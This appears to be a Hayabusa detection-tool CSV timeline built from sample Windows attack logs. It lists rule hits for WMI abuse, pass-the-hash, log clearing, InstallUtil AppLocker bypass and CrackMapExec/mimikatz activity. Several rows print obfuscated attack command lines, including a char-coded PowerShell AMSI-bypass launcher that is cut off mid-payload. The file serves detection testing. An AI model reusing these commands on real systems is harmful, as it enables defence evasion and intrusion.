0,53,53,46,50,53,53,46,48,13,10,32,32,32,68,101,102,97,117,108,116,32,71,97,116,101,119,97,121,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,13,10,32,32,32,68,72,67,80,118,54,32,73,65,73,68,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,51,48,50,48,49,48,52,53,52,13,10,32,32,32,68,72,67,80,118,54,32,67,108,105,101,110,116,32,68,85,73,68,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,49,45,48,48,45,48,49,45,50,54,45,52,54,45,50,56,45,65,68,45,48,48,45,53,48,45,53,54,45,57,55,45,50,66,45,55,55,13,10,32,32,32,68,78,83,32,83,101,114,118,101,114,115,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,49,48,46,50,51,46,52,50,46,49,48,13,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,49,48,46,50,51,46,52,50,46,49,49,13,10,32,32,32,78,101,116,66,73,79,83,32,111,118,101,114,32,84,99,112,105,112,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,69,110,97,98,108,101,100,13,10,13,10,84,117,110,110,101,108,32,97,100,97,112,116,101,114,32,105,115,97,116,97,112,46,123,68,54,56,57,48,67,54,52,45,54,67,56,55,45,52,48,54,65,45,65,69,66,56,45,69,51,51,70,53,52,69,53,66,67,56,50,125,58,13,10,13,10,32,32,32,77,101,100,105,97,32,83,116,97,116,101,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,101,100,105,97,32,100,105,115,99,111,110,110,101,99,116,101,100,13,10,32,32,32,67,111,110,110,101,99,116,105,111,110,45,115,112,101,99,105,102,105,99,32,68,78,83,32,83,117,102,102,105,120,32,32,46,32,58,32,13,10,32,32,32,68,101,115,99,114,105,112,116,105,111,110,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,77,105,99,114,111,115,111,102,116,32,73,83,65,84,65,80,32,65,100,97,112,116,101,114,13,10,32,32,32,80,104,121,115,105,99,97,108,32,65,100,100,114,101,115,115,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,48,48,45,69,48,13,10,32,32,32,68,72,67,80,32,69,110,97,98,108,101,100,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,46,32,58,32,78,111,13,10,32,32,32,65,117,116,111,99,111,110,102,105,103,117,114,97,116,105,111,110,32,69,110,97,98,108,101,100,32,46,32,46,32,46,32,46,32,58,32,89,101,115 | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process:  | Target Server: cifs/fs03vuln.offsec.lan,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx
2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 